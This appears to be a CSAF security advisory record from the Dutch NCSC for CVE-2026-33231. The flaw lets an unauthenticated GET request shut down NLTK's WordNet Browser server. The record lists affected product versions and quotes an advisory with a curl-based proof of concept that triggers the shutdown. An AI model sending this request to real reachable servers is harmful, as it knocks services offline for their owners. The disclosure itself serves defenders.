{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33231", "tracking": { "current_release_date": "2026-03-29T16:14:47.682848Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33231", "initial_release_date": "2026-03-19T15:31:30.526166Z", "revision_history": [ { "date": "2026-03-19T15:31:30.526166Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-19T15:31:33.846323Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-20T23:25:47.013386Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:25:52.673900Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-20T23:38:58.261551Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:39:01.841653Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-21T12:44:13.520895Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)." }, { "date": "2026-03-21T12:44:16.280996Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-21T15:23:06.240194Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-21T15:23:09.489788Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-23T12:30:21.487291Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (29).| Product Identifiers created (4).| Product Remediations created (29).| References created (4).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-23T12:30:32.290308Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-24T13:49:41.153823Z", "number": "13", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T13:49:44.383400Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-25T14:39:38.126364Z", "number": "15", "summary": "Unknown change." }, { "date": "2026-03-25T14:39:39.831546Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:42:03.715179Z", "number": "17", "summary": "References created (2)." }, { "date": "2026-03-26T00:37:31.451416Z", "number": "18", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (64).| Product Identifiers created (64).| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T03:29:16.747992Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-27T12:06:49.990589Z", "number": "20", "summary": "Source connected.| CVE status created. (valid)| Products connected (1).| References created (4)." }, { "date": "2026-03-27T12:06:58.081774Z", "number": "21", "summary": "NCSC Score updated." }, { "date": "2026-03-29T03:16:20.672621Z", "number": "22", "summary": "References removed (2)." }, { "date": "2026-03-29T16:14:27.600438Z", "number": "23", "summary": "References created (2)." } ], "status": "interim", "version": "23" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<11.6.0", "product": { "name": "vers:unknown/<11.6.0", "product_id": "CSAFPID-1189281" } } ], "category": "product_name", "name": "App Connect Enterprise" } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474797", "product_identification_helper": { "cpe": "cpe:/a:redhat:lightspeed_core" } } } ], "category": "product_name", "name": "Lightspeed Core" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2524222", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_lightspeed" } } } ], "category": "product_name", "name": "OpenShift Lightspeed" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1439279", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_ai" } } } ], "category": "product_name", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2920384" } } ], "category": "product_name", "name": "aap-cloud-metrics-collector-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508263" } } ], "category": "product_name", "name": "ansible-dev-tools-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5008757" } } ], "category": "product_name", "name": "ansible-dev-tools-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3054652" } } ], "category": "product_name", "name": "ansible-devspaces-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831632" } } ], "category": "product_name", "name": "de-minimal-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831633" } } ], "category": "product_name", "name": "de-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508259" } } ], "category": "product_name", "name": "de-supported-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-4675946" } } ], "category": "product_name", "name": "de-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2783920" } } ], "category": "product_name", "name": "ee-cloud-services-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3095614" } } ], "category": "product_name", "name": "ee-minimal-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698058" } } ], "category": "product_name", "name": "ee-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698059" } } ], "category": "product_name", "name": "ee-supported-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2518221" } } ], "category": "product_name", "name": "ee-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831634" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5035448" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222641" } } ], "category": "product_name", "name": "lightspeed-ocp-rag-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2960939" } } ], "category": "product_name", "name": "lightspeed-rag-tool-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508255" } } ], "category": "product_name", "name": "lightspeed-service-api-rhel9" } ], "category": "product_family", "name": "OpenShift Lightspeed" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474798" } } ], "category": "product_name", "name": "lightspeed-stack-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5826731" } } ], "category": "product_name", "name": "rag-tool-rhel9" } ], "category": "product_family", "name": "Lightspeed Core" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3112099" } } ], "category": "product_name", "name": "odh-llama-stack-core-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222767" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5276226" } } ], "category": "product_name", "name": "odh-ta-lmes-job-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5834017" } } ], "category": "product_name", "name": "odh-trustyai-nemo-guardrails-server-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222780" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift AI (RHOAI)" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1409483" } } ], "category": "product_name", "name": "nltk" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1409484" } } ], "category": "product_name", "name": "nltk" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/0.8", "product": { "name": "vers:unknown/0.8", "product_id": "CSAFPID-3249744", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9", "product": { "name": "vers:unknown/0.9", "product_id": "CSAFPID-3249745", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.3", "product": { "name": "vers:unknown/0.9.3", "product_id": "CSAFPID-3249746", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.4", "product": { "name": "vers:unknown/0.9.4", "product_id": "CSAFPID-3249747", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.5", "product": { "name": "vers:unknown/0.9.5", "product_id": "CSAFPID-3249748", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.6", "product": { "name": "vers:unknown/0.9.6", "product_id": "CSAFPID-3249749", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.7", "product": { "name": "vers:unknown/0.9.7", "product_id": "CSAFPID-3249750", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.7" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.8", "product": { "name": "vers:unknown/0.9.8", "product_id": "CSAFPID-3249751", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.9", "product": { "name": "vers:unknown/0.9.9", "product_id": "CSAFPID-3249752", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.9" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1", "product": { "name": "vers:unknown/2.0.1", "product_id": "CSAFPID-477849", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc1", "product": { "name": "vers:unknown/2.0.1rc1", "product_id": "CSAFPID-3249753", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc2-git", "product": { "name": "vers:unknown/2.0.1rc2-git", "product_id": "CSAFPID-3249754", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc2-git" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc3", "product": { "name": "vers:unknown/2.0.1rc3", "product_id": "CSAFPID-3249755", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc4", "product": { "name": "vers:unknown/2.0.1rc4", "product_id": "CSAFPID-3249756", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.2", "product": { "name": "vers:unknown/2.0.2", "product_id": "CSAFPID-3249757", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.3", "product": { "name": "vers:unknown/2.0.3", "product_id": "CSAFPID-477857", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.4", "product": { "name": "vers:unknown/2.0.4", "product_id": "CSAFPID-477865", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.5", "product": { "name": "vers:unknown/2.0.5", "product_id": "CSAFPID-3249758", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b4", "product": { "name": "vers:unknown/2.0b4", "product_id": "CSAFPID-3249759", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b5", "product": { "name": "vers:unknown/2.0b5", "product_id": "CSAFPID-3249760", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b6", "product": { "name": "vers:unknown/2.0b6", "product_id": "CSAFPID-3249761", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b6" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b7", "product": { "name": "vers:unknown/2.0b7", "product_id": "CSAFPID-3249762", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b7" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b8", "product": { "name": "vers:unknown/2.0b8", "product_id": "CSAFPID-3249763", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b8" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b9", "product": { "name": "vers:unknown/2.0b9", "product_id": "CSAFPID-3249764", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b9" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.0", "product": { "name": "vers:unknown/3.0.0", "product_id": "CSAFPID-477852", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.0" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.0b1", "product": { "name": "vers:unknown/3.0.0b1", "product_id": "CSAFPID-3249765", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.0b1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.0b2", "product": { "name": "vers:unknown/3.0.0b2", "product_id": "CSAFPID-3249766", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.0b2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.1", "product": { "name": "vers:unknown/3.0.1", "product_id": "CSAFPID-477846", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.2", "product": { "name": "vers:unknown/3.0.2", "product_id": "CSAFPID-477861", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.3", "product": { "name": "vers:unknown/3.0.3", "product_id": "CSAFPID-477847", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.4", "product": { "name": "vers:unknown/3.0.4", "product_id": "CSAFPID-477853", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.5", "product": { "name": "vers:unknown/3.0.5", "product_id": "CSAFPID-477864", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.1", "product": { "name": "vers:unknown/3.1", "product_id": "CSAFPID-477854", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2", "product": { "name": "vers:unknown/3.2", "product_id": "CSAFPID-477859", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.1", "product": { "name": "vers:unknown/3.2.1", "product_id": "CSAFPID-477850", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.2", "product": { "name": "vers:unknown/3.2.2", "product_id": "CSAFPID-477862", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.3", "product": { "name": "vers:unknown/3.2.3", "product_id": "CSAFPID-477855", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.4", "product": { "name": "vers:unknown/3.2.4", "product_id": "CSAFPID-477858", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.5", "product": { "name": "vers:unknown/3.2.5", "product_id": "CSAFPID-477856", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3", "product": { "name": "vers:unknown/3.3", "product_id": "CSAFPID-477848", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4", "product": { "name": "vers:unknown/3.4", "product_id": "CSAFPID-477860", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.1", "product": { "name": "vers:unknown/3.4.1", "product_id": "CSAFPID-477866", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.2", "product": { "name": "vers:unknown/3.4.2", "product_id": "CSAFPID-3249767", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.3", "product": { "name": "vers:unknown/3.4.3", "product_id": "CSAFPID-477863", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.4", "product": { "name": "vers:unknown/3.4.4", "product_id": "CSAFPID-477851", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.5", "product": { "name": "vers:unknown/3.4.5", "product_id": "CSAFPID-710861", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.5", "product": { "name": "vers:unknown/3.5", "product_id": "CSAFPID-710860", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.5b1", "product": { "name": "vers:unknown/3.5b1", "product_id": "CSAFPID-3249768", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.5b1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6", "product": { "name": "vers:unknown/3.6", "product_id": "CSAFPID-710863", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.1", "product": { "name": "vers:unknown/3.6.1", "product_id": "CSAFPID-710862", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.2", "product": { "name": "vers:unknown/3.6.2", "product_id": "CSAFPID-710864", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.3", "product": { "name": "vers:unknown/3.6.3", "product_id": "CSAFPID-710859", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.4", "product": { "name": "vers:unknown/3.6.4", "product_id": "CSAFPID-712017", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.5", "product": { "name": "vers:unknown/3.6.5", "product_id": "CSAFPID-712018", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.6", "product": { "name": "vers:unknown/3.6.6", "product_id": "CSAFPID-3249769", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.6" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.7", "product": { "name": "vers:unknown/3.6.7", "product_id": "CSAFPID-3249770", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.7" } } }, { "category": "product_version_range", "name": "vers:unknown/3.7", "product": { "name": "vers:unknown/3.7", "product_id": "CSAFPID-3249771", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.7" } } }, { "category": "product_version_range", "name": "vers:unknown/3.8", "product": { "name": "vers:unknown/3.8", "product_id": "CSAFPID-3249772", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.8" } } }, { "category": "product_version_range", "name": "vers:unknown/3.8.1", "product": { "name": "vers:unknown/3.8.1", "product_id": "CSAFPID-337467", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.8.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9", "product": { "name": "vers:unknown/3.9", "product_id": "CSAFPID-5667818", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9.1", "product": { "name": "vers:unknown/3.9.1", "product_id": "CSAFPID-5667819", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9.2", "product": { "name": "vers:unknown/3.9.2", "product_id": "CSAFPID-5667820", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9.3", "product": { "name": "vers:unknown/3.9.3", "product_id": "CSAFPID-5912812", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9b1", "product": { "name": "vers:unknown/3.9b1", "product_id": "CSAFPID-3249773", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9b1" } } }, { "category": "product_version_range", "name": "vers:unknown/<=3.9.3", "product": { "name": "vers:unknown/<=3.9.3", "product_id": "CSAFPID-5878160", "product_identification_helper": { "cpe": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=3.9.3", "product": { "name": "vers:unknown/>=0|<=3.9.3", "product_id": "CSAFPID-5912814" } } ], "category": "product_name", "name": "nltk" } ], "category": "vendor", "name": "nltk" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33231", "cwe": { "id": "CWE-306", "name": "Missing Authentication for Critical Function" }, "notes": [ { "category": "description", "text": "### Summary\n`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.\n\n### Details\nThe vulnerable logic is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242)\n - The server listens on all interfaces:\n - `server = HTTPServer((\"\", port), MyServerHandler)`\n\n- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87)\n - Incoming requests are checked for the exact path:\n - `if unquote_plus(sp) == \"SHUTDOWN THE SERVER\":`\n\n- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88)\n - The shutdown protection only depends on `server_mode`\n\n- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93)\n - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:\n - `os._exit(0)`\n\nThis means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.\n\n### PoC\n1. Start the WordNet Browser in Docker in its default mode:\n\n```bash\ndocker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)\"\n```\n\n2. Confirm the service is reachable:\n\n```bash\ncurl -s -o /tmp/wn_before.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\n```\n\nObserved result:\n\n```text\n200\n```\n\n3. Trigger shutdown:\n\n```bash\ncurl -s -o /tmp/wn_shutdown.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'\n```\n\nObserved result:\n\n```text\n000\n```\n\n4. Verify the service is no longer available:\n\n```bash\ncurl -s -o /tmp/wn_after.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\ndocker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\\t{{.Status}}'\ndocker logs nltk-wordnet-web-default-retest\n```\n\nObserved results:\n\n```text\n000\nnltk-wordnet-web-default-retest Exited (0)\nServer shutting down!\n```\n\n### Impact\nThis is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.\n\nAny reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:\n\n- the route is accessible over HTTP\n- no authentication or CSRF-style confirmation is required\n- the server listens on all interfaces by default\n- the process exits immediately instead of performing a controlled shutdown\n\nThis primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.", "title": "github - https://api.github.com/advisories/GHSA-jm6w-m3j8-898g" }, { "category": "description", "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33231" }, { "category": "description", "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33231.json" }, { "category": "description", "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via 